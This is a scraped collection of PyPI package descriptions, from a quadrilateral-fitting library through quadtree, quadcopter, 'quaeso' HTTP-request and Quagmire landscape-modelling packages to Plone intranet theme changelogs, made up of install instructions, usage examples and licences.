Guesswith:fitted_quadrilateral=QuadrilateralFitter(polygon=your_noisy_polygon).tight_quadrilateralAPI ReferenceQuadrilateralFitter(polygon)Initialize theQuadrilateralFitterinstance..polygon:np.ndarray | tuple | list | shapely.Polygon. List of the polygon coordinates. It must be a list of coordinates, in the formatXY, shape (N, 2).QuadrilateralFitter.fit(simplify_polygons_larger_than = 10):simplify_polygons_larger_than:int | None. List of the polygon coordinates. It must be a list of coordinates, in the formatXY, shape (N, 2). If a number is specified, the method will make a preliminarDouglas-Peuckersimplification of the internally usedConvex Hullif it has more thansimplify_polygons_larger_than vertices. This will speed up the process, but may lead to a sub-optimal quadrilateral approximation. Default: 10.Returns:tuple[tuple[float, float], tuple[float, float], tuple[float, float], tuple[float, float]]: Atuplecontaining the fourXYcoordinates of the fitted cuadrilateral. This quadrilateral will minimize theIoU(Intersection Over Union) with the inputpolygon, while containing all its points inside. If your use case can allow loosing points from the input polygon, you can read theQuadrilateralFitter.tight_polygonproperty to obtain a tighter quadrilateral.Real Case ExampleLet's simulate a real case scenario where we detect a noisy polygon from a form that we know should be a perfect rectangle (only deformed by perspective).importnumpyasnpimportcv2image=cv2.cvtColor(cv2.imread('./resources/input_sample.jpg'),cv2.COLOR_BGR2RGB)# Save the Ground Truth cornerstrue_corners=np.array([[50.,100.],[370.,0.],[421.,550.],[0.,614.],[50.,100.]],dtype=np.float32)# Generate a simulated noisy detectionsides=[np.linspace([x1,y1],[x2,y2],20)+np.random.normal(scale=10,size=(20,2))for(x1,y1),(x2,y2)inzip(true_corners[:-1],true_corners[1:])]noisy_corners=np.concatenate(sides,axis=0)# To simplify, we will clip the corners to be within the imagenoisy_corners[:,0]=np.clip(noisy_corners[:,0],a_min=0.,a_max=image.shape[1])noisy_corners[:,1]=np.clip(noisy_corners[:,1],a_min=0.,a_max=image.shape[0])And now, let's runQuadrilateralFitterto find the quadrilateral that best approximates our noisy detection (without leaving points outside).fromquadrilateral_fitterimportQuadrilateralFitter# Define the fitter (we want to keep it for reading internal variables later)fitter=QuadrilateralFitter(polygon=noisy_corners)# Get the fitted quadrilateral that contains all the points inside the input polygonfitted_quadrilateral=np.array(fitter.fit(),dtype=np.float32)# If you wanna to get a tighter mask, less likely to contain points outside the real quadrilateral,# but that cannot ensure to always contain all the points within the input polygon, you can use:tight_quadrilateral=np.array(fitter.tight_quadrilateral,dtype=np.float32)# To show the plot of the fitting processfitter.plot()Finally, for use cases like this, we could use fitted quadrilaterals to apply a perspective correction to the image, so we can get a visual insight of the results.# Generate the destiny points for the perspective correction by adjusting it to a perfect rectangleh,w=image.shape[:2]forquadrilateralin(fitted_quadrilateral,tight_quadrilateral):# Cast it to a numpy for agile manipulationquadrilateral=np.array(quadrilateral,dtype=np.float32)# Get the bounding box of the fitted quadrilateralmin_x,min_y=np.min(quadrilateral,axis=0)max_x,max_y=np.max(quadrilateral,axis=0)# Define the destiny points for the perspective correctiondestiny_points=np.array(((min_x,min_y),(max_x,min_y),(max_x,max_y),(min_x,max_y)),dtype=np.float32)# Calculate the homography matrix from the quadrilateral to the rectanglehomography_matrix,_=cv2.findHomography(srcPoints=quadrilateral,dstPoints=rect_points)# Warp the image using the homography matrixwarped_image=cv2.warpPerspective(src=image,M=homography_matrix,dsize=(w,h))"} +{"package": "quadrilemma", "pacakge-description": "QuadrilemmaYes, No, Unknown or Unknowable?"} +{"package": "quadrille", "pacakge-description": "quadrilleSquare grid simulationsConway's Game of LifeCreditsThanks tobethlenkeatHSBPfor describing\nhis C algorithm for grid advancement in a Conway implementation\nwhich was the starting point of my own approachLicenseMozilla Public License 2.0This Source Code Form is subject to the terms of the Mozilla Public\nLicense, v. 2.0. If a copy of the MPL was not distributed with this\nfile, You can obtain one at http://mozilla.org/MPL/2.0/."} +{"package": "quadro", "pacakge-description": "'''Have to see'''"} +{"package": "quadroots", "pacakge-description": "quadrootsCalculate Quadratic Roots"} +{"package": "quadruped", "pacakge-description": "QuadrupedMy robot software.YouTubeVimeoDocumentationNote:This re-write is still very early and not fully running yet, just\nparts.InstalllinuxYou will also need:pip install ds4drvpipThe recommended way to install this library is:pip install quadrupedDevelopmentIf you wish to develop and submit git-pulls, you can do:git clone https://github.com/MomsFriendlyRobotCompany/quadruped\ncd quadruped\npip install -e .TestingSince I have both python2 and python3 installed, I need to test with both:python2 -m nose *.py\npython3 -m nose *.pyLayoutHere issortof the layout of the code:Quadruped (see examples folders):Engine(serial)AHRS() - tilt compensated compassIMU() - NXP IMU from AdafruitMCP3208() - ADC for IR and whatever elseGait:command() - plans all feet through 1 gait cycle (12 steps)eachLeg(x,y,z)Engine({serial}): - handles movement hardwarelegs[4]servos[3]anglesetServoLimits()bulkWrite() - change to synccoxa, femur, tibiafk()ik()moveFoot(x,y,z)moveFootAngle(a,b,c)The example quadruped (in the examples folder), takes a dictionary. Currently\nit takes:data = {\n 'serialPort': '/dev/tty.usbserial-AL034G2K',\n 'write': 'bulk'\n}If you don\u2019t pass it a serial port, then it falls back to a simulated serial\nport (which does nothing) which is useful for testing.ToolsThis directory contains several tools for the robot:Change Log2017-Jul-070.4.1broke out into package and published to PyPi2016-Aug-100.0.1initMIT LicenseCopyright (c) 2016 Kevin J. WalchkoPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \u201cSoftware\u201d), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "quadruplet", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quads", "pacakge-description": "quadsA pure Python Quadtree implementation.Quadtreesare a useful data\nstructure for sparse datasets where the location/position of the data is\nimportant. They're especially good for spatial indexing & image processing.An actual visualization of aquads.QuadTree:UsageFull documentation athttps://quads.readthedocs.io/en/latest/>>>importquads>>>tree=quads.QuadTree(...(0,0),# The center point...10,# The width...10,# The height...)# You can choose to simply represent points that exist.>>>tree.insert((1,2))True# ...or include extra data at those points.>>>tree.insert(quads.Point(4,-3,data=\"Samus\"))True# You can search for a given point. It returns the point if found...>>>tree.find((1,2))Point(1,2)# Or `None` if there's no match.>>>tree.find((4,-4))None# You can also find all the points within a given region.>>>bb=quads.BoundingBox(min_x=-1,min_y=-2,max_x=2,max_y=2)>>>tree.within_bb(bb)[Point(1,2)]# You can also search to find the nearest neighbors of a point, even# if that point doesn't have data within the quadtree.>>>tree.nearest_neighbors((0,1),count=2)[Point(1,2),Point(4,-4),]# And if you have `matplotlib` installed (not required!), you can visualize# the tree.>>>quads.visualize(tree)Installation$ pip install quadsRequirementsPython 3.7+ (untested on older versions but may work)Running Tests$ git clone https://github.com/toastdriven/quads.git\n$ cd quads\n$ poetry install\n$ poetry shell\n\n# Just the tests.\n$ pytest .\n\n# With coverage.\n$ pytest -s --cov=quads .\n# And with pretty reports.\n$ pytest -s --cov=quads . && coverage htmlLicenseNew BSD"} +{"package": "quad-sim-python", "pacakge-description": "quad_sim_pythonSimple quadcopter simulator in PythonInstallation:Method #0$ pip3 install quad_sim_python --upgradeMethod #1$ git clone https://github.com/ricardodeazambuja/quad_sim_python.git\n$ cd quad_sim_python\n$ pip3 install . --upgradeMethod #2$ pip3 install git+git://github.com/ricardodeazambuja/quad_sim_python --upgradeHow to use it:Check the files inside the directoryexamples:run_online.pyandrun_trajectory.py.AcknowledgmentsAdapted fromhttps://github.com/bobzwik/Quad_Exploration"} +{"package": "quadsolver", "pacakge-description": "No description available on PyPI."} +{"package": "quadtreed3", "pacakge-description": "QuadtreeA Python implementation ofQuadtree. The tree structure is compatible withd3-quadtree."} +{"package": "quadtree-fast", "pacakge-description": "No description available on PyPI."} +{"package": "quadwi", "pacakge-description": "Provides a framework to receive data over a socket and pump it into a shared memory."} +{"package": "quadx88", "pacakge-description": "QUADx88Configurable dynamical model of quadcopterAPI documentationTheQuadcopterClassTo construct a quadcopter object we can call the constructorimportquadx88asqxcopter=qx.Quadcopter(mass=1.15,ts=0.0083,prop_mass=0.01)The following parameters can be provided to the above constructorParameterDescriptionDefaulttsSampling time (s)1/125massTotal mass of the copter (kg)1arm_lengthArm length (m)0.225moi_xxx-x moment of inertia0.01788moi_yyx-x moment of inertia0.03014moi_zzz-z moment of inertia0.04614gravity_accgravitational acceleration (m/s2)9.81air_densityair density (kg/m3)1.225K_vKv constant of motors (rpm/V)1000motor_time_constantmotor time constant (s)0.05rotor_massrotor mass (kg)0.04rotor_radiusrotor radius (m)0.019motor_massmotor mass (kg)0.112voltage_maxmaximum voltage (V)16.8voltage_minminimum voltage (V)15.0thrust_coeffthrust coefficient of propellers0.112power_coeffpower coefficient of propellers0.044prop_masspropeller mass (kg)0.009prop_diameter_inpropeller diameter (inches)10GettersMethod/PropertyDescriptionstateNine dimensional state of the system, $x=(q, \\omega, n)$quaternionCurrent quaternionhover_rpmHovering spin in RPMeuler_angles()Current Euler angles in degreesSettersTo initialise the state of the system the following methods are availableset_initial_quaternion(q), whereqis the quaternionset_initial_angular_velocity(w)set_initial_motor_spin(spin)set_initial_euler_angles(yaw, pitch, roll, angle_unit=ANGLE_UNITS.RADIANS), whereyaw,pitchandrolland the three Euler angles (in this order) andangle_unitis the units of measurement. For example to construct a quadcopter object with an initial attitude of $\\phi=0^\\circ$, $\\theta=1^\\circ$ and $\\psi=-5^\\circ$ we can docopter=qx.Quadcopter()copter.set_initial_euler_angles(-5,0,1,ANGLE_UNITS.DEGREES)System matricesThe methodscontinuous_linearised_matricesanddiscrete_linearised_matricesreturn a dictionary with the continuous-time and discrete-time matrices of the linearised system respectively. The discrete-time linearised system has the form\n$$\\begin{aligned}\nx_{t+1} =& Ax_t + Bu_t,\n\\\ny_t =& Cx_t.\n\\end{aligned}$$Nonlinear dynamical systemTo simulate the nonlinear model you can usemove(u)which updates the system state following the application of a given control action for the duration of the sampling time."} +{"package": "quaerere-base-client", "pacakge-description": "Aboutquaerere-base-clientcontains the common elements shared between components of the Quaerere Platform.LinksDocumentation:http://quaerere-base-client.readthedocs.io/PyPI:https://pypi.org/project/quaerere-base-client/Source:https://github.com/QuaererePlatform/quaerere-base-client.gitInstallationUsing pip:pipinstallquaerere-base-clientOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaerere-base-common", "pacakge-description": "Aboutquaerere-base-commoncontains the common elements shared between components of the Quaerere Platform.LinksDocumentation:http://quaerere-base-common.readthedocs.io/PyPI:https://pypi.org/project/quaerere-base-common/Source:https://github.com/QuaererePlatform/quaerere-base-common.gitInstallationUsing pip:pipinstallquaerere-base-commonOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaerere-base-flask", "pacakge-description": "Aboutquaerere-base-flaskcontains the common elements shared between components of the Quaerere Platform.LinksDocumentation:http://quaerere-base-flask.readthedocs.io/PyPI:https://pypi.org/project/quaerere-base-flask/Source:https://github.com/QuaererePlatform/quaerere-base-flask.gitInstallationUsing pip:pipinstallquaerere-base-flaskOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaerere-columbia-common", "pacakge-description": "Aboutquaerere-columbia-commoncontains the common elements shared between the columbia micro-service\nand client.LinksDocumentation:http://quaerere-columbia-common.readthedocs.io/PyPI:https://pypi.org/project/quaerere-columbia-common/Source:https://github.com/QuaererePlatform/columbia-common.gitInstallationUsing pip:pipinstallquaerere-columbia-commonOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaerere-willamette", "pacakge-description": "This is a part of the Quaerere Platform and is intended to be used with the other Quaerere Platform micro-services.DeploymentThe preferred method of deployment is through the docker images, however the standard setup.py method will be supported.APITasksConfigurationMost configuration is done with environment variables"} +{"package": "quaerere-willamette-client", "pacakge-description": "Aboutquaerere-willamette-clientis the client library used to interact with the willamette service RESTful APILinksDocumentation:http://willamette-client.readthedocs.io/PyPI:https://pypi.org/project/quaerere-willamette-client/Source:https://github.com/QuaererePlatform/willamette-client.gitInstallationUsing pip:pipinstallquaerere-willamette-clientOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaerere-willamette-common", "pacakge-description": "Aboutquaerere-willamette-commoncontains the common elements shared between the willamette micro-service\nand client.LinksDocumentation:http://quaerere-willamette-common.readthedocs.io/PyPI:https://pypi.org/project/quaerere-willamette-common/Source:https://github.com/QuaererePlatform/willamette-common.gitInstallationUsing pip:pipinstallquaerere-willamette-commonOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaeroml-serving", "pacakge-description": "No description available on PyPI."} +{"package": "quaesit", "pacakge-description": "QuAESiTA framework for easy development of agent-based modelsQuaesit stands forQuickandEasySimulationTools. This package is based on the concepts and architecture of platforms such as Netlogo, as well as other Python packages for agent-based modelling, namely mesa. It is also based on the architecture of ExPaND, a model developed by me for simulating human migrations in South America.Documentation and Tutorialjgregoriods.github.io/quaesit"} +{"package": "quaeso", "pacakge-description": "\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\n\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\n\u2588\u2588\u2551\u2584\u2584 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\n\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\n \u255a\u2550\u2550\u2580\u2580\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \n---------------------------------------------------\npython cli program to send requestsIs it just me or is curl a little too complicated?\nWant something simpler in life? something made for humans? Try quaeso -- A Python program that reads a json/yml file for request data and sends the requestInstallationpip install this repo.\n(Note: Incompatible with Python 2.x)pip3installquaeso(or)pipinstallquaesoUsage exampleTo get help with commandline argumentsquaeso--helpUsing Command-line Argumentsquaeso-f\"some/folder/myrequest.yml\"(or)quaeso-f\"some/folder/myrequest.json\"Colorize Outputquaeso-f\"some/folder/myrequest.yml\"-cDisclaimersometimes the quaeso command doesn't work in windows if the package is installed globally.to avoid this, install the package in a local virtual envfirst, create a envpython3-mvenvenv_for_quaesoactivate that env.\\env_for_quaeso\\Scripts\\activateand then pip install. But you will have to activate that env everytime you want to use quaeso.IO Redirectionthe response is written to stdout and headers/status are written to stderr so that users can take IO redirection to their advantage. This works on windows, linux and mac.quaeso-f\"some/folder/myrequest.yml\">res.json2>res_headers.txtboth stdout and stderr can be redirected to the same filequaeso-f\"some/folder/myrequest.yml\">res.txt2>&1Sample request file (myrequest.yml)GETurl:https://cdn.animenewsnetwork.com/encyclopedia/api.xml?anime=4658method:getparams:offset:2limit:100headers:accept:text/xmlaccept-language:entimeout:5000File Download (quaeso -f \"some/folder/myrequest.yml\" > book.pdf)url:http://do1.dr-chuck.com/pythonlearn/EN_us/pythonlearn.pdfmethod:getPOSTurl:https://jsonplaceholder.typicode.com/todos/method:POSTheaders:Authorization:Basic bXl1c2VybmFtZTpteXBhc3N3b3Jkcontent-type:application/jsondata:title:walk the dogcompleted:falsetimeout:5000PUTurl:https://jsonplaceholder.typicode.com/todos/1method:PUTheaders:content-type:application/jsondata:title:walk the dogcompleted:truetimeout:5000DELETEurl:https://jsonplaceholder.typicode.com/todos/1method:DELETEComplete request file with all available fields (myrequest.yml)method:XXX# (REQUIRED) GET, OPTIONS, HEAD, POST, PUT, PATCH, or DELETEurl:XXX# (REQUIRED) must be prefixed with http:// or https://params:# url query parameters. have as many as you likeoffset:0limit:10data:# data for POSTname:johnage:22hobbies:-running-eating-sleeping# you can also type data in json format instead of yamldata:|{\"name\": \"john\",\"age\": 22,\"hobbies\": [\"running\", \"eating\", \"sleeping\"]}headers:# have as many as you likeContent-Type:application/jsonAuthorization:Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5ccookies:# have as many as you likemycookie:cookievaluemyothercookie:othercookievaluetimeout:3.14# secondsallow_redirects:true# true or falseproxies:# have as many as you likehttp:http://10.10.1.10:3128https:https://10.10.1.11:1080ftp:ftp://10.10.1.10:3128# EITHER verify server's TLS certificate. true or falseverify:true# OR path to a CA bundle to useverify:some/folder/cacert.crt# EITHER path to single ssl client cert file (*.pem)cert:some/folder/client.pem# OR (*.cert), (*.key) pair.cert:-some/folder/client.cert-some/folder/client.keyDevelopment setupClone this repo and install packages listed in requirements.txtpip3install-rrequirements.txtMetaM. Zahash \u2013zahash.z@gmail.comDistributed under the MIT license. SeeLICENSEfor more information.https://github.com/zahash/ContributingFork it (https://github.com/zahash/quaeso/fork)Create your feature branch (git checkout -b feature/fooBar)Commit your changes (git commit -am 'Add some fooBar')Push to the branch (git push origin feature/fooBar)Create a new Pull Request"} +{"package": "quagmire", "pacakge-description": "QuagmireQuagmire is a Python surface process framework for building erosion and deposition models on highly parallel, decomposed structured and unstructured meshes.Quagmire is structured into three major classes that inherit methods and attributes from lower tiers.The Surface Processes class inherits from the Topography class, which in turn inherits from TriMesh or PixMesh depending on the type of mesh.InstallationNumpy and a fortran compiler, preferablygfortran, are required to install Quagmire.python setup.py buildIf you change the fortran compiler, you may have to add the\nflagsconfig_fc --fcompiler=when setup.py is run\n(see docs fornumpy.distutils).python setup.py installDependenciesRunning this code requires the following packages to be installed:Python 3.7.x and aboveNumpy 1.9 and aboveScipy 0.15 and abovempi4pypetsc4pystripyh5py(optional - for saving parallel data)Matplotlib (optional - for visualisation)PETSc installationPETSc is used extensively via the Python frontend, petsc4py. It is required that PETSc be configured and installed on your local machine prior to using Quagmire. You can use pip to install petsc4py and its dependencies.[sudo] pip install numpy mpi4py\n[sudo] pip install petsc petsc4pyIf that fails you must compile these manually.HDF5 installationThis is an optional installation, but it is very useful for saving data that is distributed across multiple processes. If you are compiling HDF5 fromsourceit should be configured with the--enable-parallelflag:CC=/usr/local/mpi/bin/mpicc ./configure --enable-parallel --enable-shared --prefix=\nmake\t# build the library\nmake check\t# verify the correctness\nmake installYou can then point to this install directory when you installh5py.UsageQuagmire is highly scalable. All of the python scripts in thetestssubdirectory can be run in parallel, e.g.mpirun -np 4 python stream_power.pywhere the number after the-npflag specifies the number of processors.TutorialsTutorials with worked examples can be found in theNotebookssubdirectory. These are Jupyter Notebooks that can be run locally. We recommend installingFFmpegto create videos in some of the notebooks.The topics covered in the Notebooks include:MeshingSquare meshElliptical meshMesh refinement (e.g. Lloyd's mesh improvement)Poisson disc samplingMesh Variablesquagmire function interface (requires a base mesh)Flow algorithmsSingle and multiple downhill pathwaysAccumulating flowErosion and depositionLong-range stream flow modelsShort-range diffusive evolutionLandscape evolutionExplicit timestepping and numerical stabilityLandscape equilibrium metricsBasement upliftRelease Notes v0.5.0bThis is the first formal 'release' of the code whichSummary of changesIntroducing quagmire.function which is a collection of lazy-evaluation objects similar to underworld functionsIntroducing MeshVariables which wrap PETSc data vectors and provide interoperability with quagmire functionsProviding context manager support for changes to topography that automatically update matrices appropriatelyMaking all mesh variable data arrays view only except for assignment from a suitably sized numpy array (this is to ensure correct synchronisation of information in parallel).various @property definitions to handle cases where changes require rebuilding of data structuresmaking many mesh methods private and exposing them via functionsupstream integration is a function on the meshupstream / downstream smoothing is via a mesh functionrbf smoothing builds a manager that provides a function interface"} +{"package": "quahris", "pacakge-description": "No description available on PyPI."} +{"package": "quaidan", "pacakge-description": "UNKNOWN"} +{"package": "quail", "pacakge-description": "Quail is a Python package that facilitates analyses of behavioral data from memory experiments. (The current focus is on free recall experiments.) Key features include:Serial position curves (probability of recalling items presented at each presentation position)Probability of Nth recall curves (probability of recalling items at each presentation position as the Nth recall in the recall sequence)Lag-Conditional Response Probability curves (probability of transitioning between items in the recall sequence, as a function of their relative presentation positions)Clustering metrics (e.g. single-number summaries of how often participants transition from recalling a word to another related word, where \u201crelated\u201d can be user-defined.)Many nice plotting functionsConvenience functions for loading in dataAutomatically parse speech data (audio files) using wrappers for the Google Cloud Speech to Text APIThe intended user of this toolbox is a memory researcher who seeks an easy way to analyze and visualize data from free recall psychology experiments."} +{"package": "quailbox", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quaive.app.taxonomy", "pacakge-description": "A taxonomy browser for ploneintranetFeaturesAllows browsing through a hierarchical taxonomySupports search on taxonomy and on content withinDedicated search and group view for each taxonomy termBackgroundThe app has been discussed and specified at\n-https://github.com/quaive/ploneintranet.prototype/issues/272DocumentationFull documentation for end users can be found in the \u201cdocs\u201d folder, and is also available online athttp://docs.quaive.netTranslationsThis product has been translated intoGerman (thanks, Angela Merkel)InstallationInstall quaive.app.taxonomy by adding it to your buildout:[buildout]\n\n...\n\neggs =\n quaive.app.taxonomyYour Quaive instance will need to register a vdex vocabulary and add the identifier of that vocabulary to the solr index configuration.Run buildout to update your instance:bin/buildoutAdd the vocabulary identifier to following registry entries:ploneintranet.search.filter_fields\nploneintranet.search.facet_fieldsAdd an adapter to configure an app tile, see quaive/app/taxonomy/tests/configure.zcml for an example.ContributeIssue Tracker:https://github.com/collective/quaive.app.taxonomy/issuesSource Code:https://github.com/collective/quaive.app.taxonomyDocumentation:https://docs.quaive.netSupportIf you are having issues, please let us know.\nWe have a mailing list located at:ploneintranet-dev@groups.ioLicenseThe project is licensed under the GPLv2.ContributorsAlexander Pilz,pilz@syslab.comChangelog1.2.2 (2017-11-20)Public release.1.2.1 (2017-08-28)Fixes:(slc #15736) Don\u2019t throw error if search term is unicode [deroiste]1.2.0 (2017-05-02)Fixes:Decorate the app view with IAppView to make the app\ncompatible with ploneintranet master.\n[ale]1.1.7 (2016-12-01)New features:Translation labels.\n[angeldasangel]1.1.6 (2016-11-21)Nothing changed.1.1.5 (2016-11-17)Fixes:Fix sidebar search injection [deroiste]Sidebar Search: search by partial taxonomy terms [deroiste]1.1.4 (2016-10-24)New features:Sort by date when grouping by workspace and author [deroiste]Fixes:Fix test setup: import config for docconv1.1.3 (2016-10-14)Fixes:Adapt to new App structure. All parameters come from the App now,\nnot the requestAdapt to changed search / proto view in ploneintranet1.1.2 (2016-09-09)Fixes:Fix tests: use the app as the search tile context [deroiste]Fix sidebar enlarger target [pilz]1.1.1 (2016-09-08)Fixes:Fix injection target [pilz]1.1 (2016-09-08)Fixes/New features:Sort grouped results by titleAdd search grouping by workspace and authorsidebar-search: use solr instead of the catalog\nThe normal Sidebar view uses the catalog, presumably to avoid the delay\ncaused by asynchronous indexing with solr.sidebar-search: handle unicode vocab termsAdd the option to configure a separate vocab index\nThis allows the search index to have a different id from the\nvocabulary. It\u2019s configured on the app_parameters e.g.\n{\u2018vocabulary_index\u2019: \u2018someidx\u2019}Also search by vocab termsImplement sidebar search\nDesign: quaive/ploneintranet.prototype#272Updated to app objects\nAlso, the vocabulary does not need to be passed as a GET parameter any\nmore, since it is now defined in the app_parameters.Include documents in the sidebar, implement searchImproved testing, better handling of values1.0a1 (2016-07-16)Initial release.\n[pilz]"} +{"package": "quaive.resources.ploneintranet", "pacakge-description": "ContributeIssue Tracker:https://github.com/quaive/quaive.resources.ploneintranet/issuesSource Code:https://github.com/quaive/quaive.resources.ploneintranetDocumentation:https://github.com/quaive/ploneintranet/blob/master/docs/development/releasing.rstSupportIf you are having issues, please let us know:https://groups.io/g/ploneintranet-devLicenseThe project is licensed under the GPLv2.Contributorsale-rt,pisa@syslab.comChangelog2.0.8 (2017-11-20)New:Update diazo and js2.0.7 (2017-11-08)Fixed:Drop the theme \u201cback-to-portal\u201d on screen help.\nDiazo will set the corrent one from the theme when replacing the site logo.2.0.6 (2017-10-23)New:Update diazo and js to fix IE11 issues2.0.5 (2017-10-11)New:Update diazo and js2.0.4 (2017-10-11)New:Update diazo and js2.0.3 (2017-09-22)New:Update diazo and js2.0.2 (2017-09-20)New:Update diazo2.0.1 (2017-09-09)New:New js build2.0.0 (2017-09-01)New:The latest prototype uses patternslib 3 and webpack to bundle\nthe javascrcipt resources.1.3.28 (2017-08-29)Added:A diazo rule to properly render the on screen help toggle button\n(Refs. Syslab #15824).\n[Alessandro Pisa]1.3.27 (2017-08-29)Fixes:Include the patch fromhttps://github.com/Patternslib/Patterns/pull/510that fixes a collision between pat-modal and pat-collapsible.New:Updated the theme\n[Alessandrop Pisa]1.3.26 (2017-07-24)Prepare the diazo rules for the help bubblesUnderstand the is_modal_panel view attributeAdded rules for panelsUpdated the js releaseUpdated diazo [Alessandro Pisa]1.3.25 (2017-06-13)Updated bundle and diazo theme [Alessandro Pisa]1.3.24 (2017-06-05)Updated bundle and diazo theme [Alessandro Pisa]1.3.23 (2017-05-30)Clean up annotorius [Alessandro Pisa]Fix Makefile [Alessandro Pisa]Via Proto: Updated Blue theme for Quaive, plus new Quaive logo [Wolfgang Thomas]Back to blue [Alessandro Pisa, Wolfgang Thomas]Simplify the diazo rules [Alessandro Pisa]1.3.21 (2017-05-12)Copy the lang attribute of the html element [Alessandro Pisa]Updated js bundle [Alessandro Pisa]1.3.21a1 (2017-05-09)Simplify the diazo rules and copy the title tag from Plone\n(see quaive/ploneintranet#1027) [Alessandro Pisa]1.3.20 (2017-05-08)Update CSS [Alessandro Pisa]1.3.20a1 (2017-04-28)Simplify diazo rules [Alessandro Pisa]Updated theme and bundle [Alessandro Pisa]1.3.19 (2017-03-29)Updated bundle [Alessandro Pisa]1.3.18 (2017-03-07)Updated Proto [Alessandro Pisa]1.3.17 (2017-02-21)Do not render the Plone toolbar when we do not need it [Alessandro Pisa]1.3.16 (2017-02-01)Nothing changed yet.1.3.15 (2017-01-18)Nothing changed yet.1.3.14 (2016-12-20)Drop the alpha [Guido A.J. Stevens]Update changelog [Guido A.J. Stevens]ignore auto-backups [Guido A.J. Stevens]Don\u2019t show a no-op global settings link [Guido A.J. Stevens]update proto [Alexander Pilz]fixurl doesn\u2019t like the if statements on the same line [Alexander Pilz]Fix regression for Library details page (ported from ikath) Seehttps://git.syslab.com/ikath/quaive.resources.ikath/commit/6ffe0Disable q.r.p. resources in Barceloneta fixeshttps://github.com/quaive/ploneintranet/issues/876[Guido A.J. Stevens]update proto [Alexander Pilz]update proto [Alexander Pilz]Let\u2019s be Quaive [Alessandro Pisa]update js bundle [Alexander Pilz]Back to development: 1.3.0a14 [Wolfgang Thomas]1.3.0a13 (2016-11-07)simplify the rules for the whole password reset story. This implies that all\nrelevant templates are overriden in ploneintranet, see quaive/ploneintranet#870\n[Wolfgang Thomas]Support newsitem view [Guido Stevens]Add 16x9 placeholder for news magazine [Guido Stevens]1.3.0a12 (2016-11-01)Preparing release 1.3.0a12 [Alexander Pilz]Update diazo [Alexander Pilz]Back to development: 1.3.0a12 [Alexander Pilz]1.3.0a11 (2016-10-27)Preparing release 1.3.0a11 [Alexander Pilz]update diazo [Alexander Pilz]Back to development: 1.3.0a11 [Alessandro Pisa]1.3.0a10 (2016-10-26)Catch urls like ++add++ptype (used in tests) [Alessandro 